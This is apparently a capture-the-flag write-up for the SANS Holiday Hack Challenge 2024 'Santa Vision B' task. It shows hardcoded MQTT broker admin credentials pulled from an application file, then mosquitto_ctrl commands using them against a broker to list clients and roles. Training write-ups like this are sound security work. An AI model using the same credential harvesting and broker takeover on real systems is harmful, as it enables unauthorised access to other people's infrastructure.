SANS Holiday Hack Challenge 2024 - Act 3

Santa Vision B

Difficulty: ❄ ❄ ❄ ❄ ❄
Once logged on, authenticate further without using Wombley’s or Alabaster’s accounts to see the northpolefeeds on the monitors. What username worked here?

Silver

Further analysis of the contents within /static/sv-application-2024-SuperTopSecret-9265193/applicationDefault.bin, I found the file app/src/core/views.py which led to the user SantaBrokerAdmin:

1
2
3
4
5
6
7
8
9
# ...omissis...
mqttPublish.single("$CONTROL/dynamic-security/v1","{\"commands\":[{\"command\": \"deleteClient\",\"username\": \""+name+"\"}]}",hostname="localhost",port=1883,auth={'username':"SantaBrokerAdmin", 'password':"8r0k3R4d1mp455wD"})
# ...omissis...
mqttPublish.single("$CONTROL/dynamic-security/v1","{\"commands\":[{\"command\": \"removeRoleACL\",\"rolename\": \""+PlyrRole+"\",\"acltype\": \"subscribeLiteral\",\"topic\": \""+PlyrTopic+"\"}]}",hostname="localhost",port=1883,auth={'username':"SantaBrokerAdmin", 'password':"8r0k3R4d1mp455wD"})
# ...omissis...
mqttPublish.single("$CONTROL/dynamic-security/v1","{\"commands\":[{\"command\": \"deleteRole\",\"rolename\": \""+PlyrRole+"\"}]}",hostname="localhost",port=1883,auth={'username':"SantaBrokerAdmin", 'password':"8r0k3R4d1mp455wD"})        
# ...omissis...
mqttPublish.multiple(CreatePlayerClients,hostname="localhost",port=1883,auth={'username':"SantaBrokerAdmin", 'password':"8r0k3R4d1mp455wD"})
# ...omissis...

I could then use this user to login and subscribe to additional feeds (e.g. #). The answer for this was the username SantaBrokerAdmin.

Gold

By listing all the clients I noticed santashelper2024 being the only one I still had no information about but having access to the feed:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
(act3-SantaVision) thedead@maccos act3-SantaVision % mosquitto_ctrl -v -h 34.44.88.211 -p 1883 -u SantaBrokerAdmin -P 8r0k3R4d1mp455wD dynsec listClients      
Warning: You are running mosquitto_ctrl without encryption.
This means all of the configuration changes you are making are visible on the network, including passwords.

AlabasterS
AlabasterS-viewer
SantaBrokerAdmin
WomblyC
WomblyC-viewer
elfanon
elfmonitor
elfmonitor-viewer
santaMonitor
santashelper2024
santashelper2024-viewer
1
2
3
4
5
6
7
8
9
10
11
(act3-SantaVision) thedead@maccos act3-SantaVision % mosquitto_ctrl -v -h 34.44.88.211 -p 1883 -u SantaBrokerAdmin -P 8r0k3R4d1mp455wD dynsec getClient santashelper2024
Warning: You are running mosquitto_ctrl without encryption.
This means all of the configuration changes you are making are visible on the network, including passwords.

Username: santashelper2024
Clientid:
Roles:    FrostbitFeedsReadRole (priority: -1)
          NorthPoleFeedsAdminRole-viewer (priority: -1)
          NorthPoleFeedsSantaHelperRole-viewer (priority: -1)
          SantaFeedsRole (priority: -1)
          SiteStatusElfRole (priority: -1)

The answer for the gold trophy is santashelper2024.